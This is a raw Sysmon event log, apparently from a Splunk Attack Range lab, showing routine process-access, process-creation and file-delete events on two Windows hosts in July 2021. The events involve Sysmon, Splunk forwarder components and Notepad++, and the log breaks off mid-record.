07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.553{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.554{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.069{0C1E0330-F4F6-60EB-7E79-00000000D001}2896840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DEB8C56991C6BADFCBF8FAB29212A23,SHA256=4563341272B051A48BB75ACB0339A38E7FAD70697A5D62AA81790CCC2F6CEB8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.794{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2272FD853DB75FA302671E52F54ABD93,SHA256=074A0ED53E6449C699F179AAB60CF35B073E01DE9D0C4F94178E9CAEA18DC6B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.632{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.632{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4F8-60EB-447D-00000000CF01}9232C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4F8-60EB-447D-00000000CF01}9232C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001049299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.483{466BC892-F4F8-60EB-447D-00000000CF01}9232C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 10341000x8000000000000000807824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.381{0C1E0330-F4F8-60EB-8079-00000000D001}36763068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C138494E9639A44C88074A577450A7A,SHA256=754029B72BE6C96C62D2F58FFFECD511BF33CFF904FA247032F6B83E285CC051,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 